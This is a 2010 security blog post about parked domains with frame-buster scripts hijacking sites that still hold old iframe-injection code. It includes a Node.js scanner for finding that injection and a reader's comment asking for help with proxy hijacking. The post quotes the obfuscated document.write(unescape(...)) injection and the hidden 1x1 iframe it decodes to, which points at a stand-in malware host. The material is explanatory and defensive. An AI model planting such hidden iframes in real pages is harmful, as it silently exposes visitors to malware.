Sunday, September 26, 2010

Domain Parks Hijacking Previously Hacked Sites?

Lately I've been seeing an increase in some domain parks using frame buster scripts and it really didn't make any sense to me.

Why would a domain park need a frame buster script?

Then I discovered a potential secret: these domain parks, whether intentionally or not, are hijacking sites that were previously victims of the iframe injection hack!

Let's examine how this works.

The iframe injector exploit happens when a hacker adds a line of JavaScript to your page like this:

<script Language="Javascript">document.write(unescape('%3C%69%66%.....61%6D%65%3E'));</script>

That line of script decodes the percent-encoded content in the unescape() call (it is encoded, not encrypted) into something like this:

<iframe src="http://malware.location.example.com" width=1 height=1></iframe>

Once the search engines or browsers detect this problem, the victim's site gets the usual safe-surf malware warnings whenever visitors attempt to view its pages, for as long as malware continues to exist at http://malware.location.example.com. However, once the malware is removed, the hacked domains are often shut down or abandoned and end up in a domain park. With no malware left at http://malware.location.example.com, the safe-surf warnings stop and everything looks normal again. Therefore, webmasters who never knew their sites were hacked in the first place, and never fixed the problem, are now potentially at the mercy of any domain park that employs frame busting.

If you didn't follow that, let's simplify it:

Some of the domain parks now add a FRAME BUSTER SCRIPT to their domain park pages.

Now any time a visitor goes to a site that was previously hacked and never repaired, their browser executes that injected JavaScript, the hidden iframe loads the domain park page, and the park's frame buster redirects the visitor's whole browser window to the domain park page.

You can see the frame buster script in the domain park pages:
function EscapeBrowserFrame(){ .... }
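
As an added example (not code from the original post), the following Node.js script is a webmaster-side check for the injection described above: it finds document.write(unescape('...')) calls in a page, decodes the percent-encoded payload, and reports any hidden 1x1 iframes that payload would write, along with the domain each one loads. The sample page, the helper and function names, and the reuse of the post's malware.location.example.com hostname are all constructed for the demo and are assumptions, not anything from the original site or a real domain park.

```javascript
// Added example (not from the original post): scan an HTML document for the
// document.write(unescape('...')) injection, decode the payload, and report
// any hidden iframes it would write. All sample markup below is constructed.

// Decode JavaScript unescape()-style encoding: %XX bytes and %uXXXX code units.
function decodeUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Percent-encode every character; used only to build the constructed sample
// so the demo stays readable instead of embedding a long hand-typed literal.
function percentEncodeAll(s) {
  return [...s].map(c => '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
}

// Find every unescape('...') / unescape("...") call inside <script> blocks
// and return the decoded payloads.
function extractUnescapePayloads(html) {
  const payloads = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const unescRe = /unescape\(\s*(['"])((?:\\.|(?!\1).)*)\1\s*\)/g;
  let sm;
  while ((sm = scriptRe.exec(html)) !== null) {
    let um;
    while ((um = unescRe.exec(sm[1])) !== null) {
      payloads.push(decodeUnescape(um[2]));
    }
  }
  return payloads;
}

// Parse iframes out of decoded markup and decide whether each is "hidden":
// a 1x1 or 0x0 frame, or one styled display:none / visibility:hidden.
function findHiddenIframes(markup) {
  const results = [];
  const iframeRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = iframeRe.exec(markup)) !== null) {
    const attrs = m[1];
    const get = (name) => {
      const r = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i').exec(attrs);
      return r ? (r[1] ?? r[2] ?? r[3]) : null;
    };
    const src = get('src');
    const width = parseInt(get('width'), 10);
    const height = parseInt(get('height'), 10);
    const style = (get('style') || '').toLowerCase();
    const hidden = (!isNaN(width) && width <= 1) || (!isNaN(height) && height <= 1)
      || /display\s*:\s*none|visibility\s*:\s*hidden/.test(style);
    let host = null;
    try { host = src ? new URL(src).hostname : null; } catch (e) { host = null; }
    results.push({ src, host, width, height, hidden });
  }
  return results;
}

// Full scan: every hidden iframe that an unescape() payload would write.
// Each reported host is a domain that, if it later lands in a domain park
// whose page runs a frame buster, can redirect the whole victim page.
function scanForInjectedIframes(html) {
  const findings = [];
  for (const payload of extractUnescapePayloads(html)) {
    for (const f of findHiddenIframes(payload)) {
      if (f.hidden) findings.push(f);
    }
  }
  return findings;
}

// Constructed sample page: one legitimate script plus the injected line,
// using the post's example hostname (an assumption for the demo).
const SAMPLE_INJECTED_MARKUP = '<iframe src="http://malware.location.example.com" width=1 height=1></iframe>';
const SAMPLE_PAGE = `<html><head><title>Victim page</title></head><body>
<p>Hello</p>
<script type="text/javascript">var x = 1;</script>
<script Language="Javascript">document.write(unescape('${percentEncodeAll(SAMPLE_INJECTED_MARKUP)}'));</script>
</body></html>`;

console.log(JSON.stringify(scanForInjectedIframes(SAMPLE_PAGE), null, 2));
```

Run it over your own saved HTML files. A reported host is worth checking, but the fix is the same regardless of who currently owns that domain: remove the injected script line from the page and from whatever template or server-side exploit put it there. The scanner deliberately ignores iframes that are not hidden, so adjust the size test if your legitimate markup uses tiny frames.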
To add insult to injury, innocent webmasters were not only victims of hackers, but now they're the unwitting victims of having their sites hijacked by domain parks!

A nice double whammy!

Many sites have been hacked by server-wide exploits, which have been documented previously in this very blog. It's very possible (most likely, in fact) that the hosts never reported the problem to their customers, so the website owners never knew they needed to fix their pages. This situation has probably left literally tens of thousands of sites vulnerable over time to being eventually hijacked.

The real kicker here is that the domain used to distribute malware could fall into a domain park at any time. Maybe the victim's site will be hijacked today, maybe tomorrow, maybe a year from now, but the potential risk is great. If that line of JavaScript left by the hacker is allowed to stay in the victim's website and the hacker's domain eventually falls into the right domain park, the victim's site will also be hijacked.

Iframe injector scripts: the hacker's gift that just keeps on giving!

1 comment:

Jimmy said...

Hi IncrediBill,

I came across some of your articles today and I really wanted to get some advice from you. Recently my blog has been proxy hijacked. At least that's what I think the term for it is. My htaccess file is clean; however, you can see this well if you type "cheap car insurance quotes" into Google. I was on the first page for my website centralinsurance.org; now in place of it I see ronny-dwijayanto-web-proxy.appspot.com/centralinsurance.org/. I don't own this other domain and I am not sure how this is happening, but you seem to be an expert in this subject. Is there any chance you may be able to tell me how I can revert this proxy hijack, as I don't see where they have actually broken into my site, just simply scraped the content from it. I am desperate; any help you can provide is very appreciated. My contact email is jimmykelley19@gmail.com. I look forward to hearing from you. I have found no other help in any other areas yet and I am now trying to reach out to those that I believe know the solution, hence this email.

respectfully,
Jimmy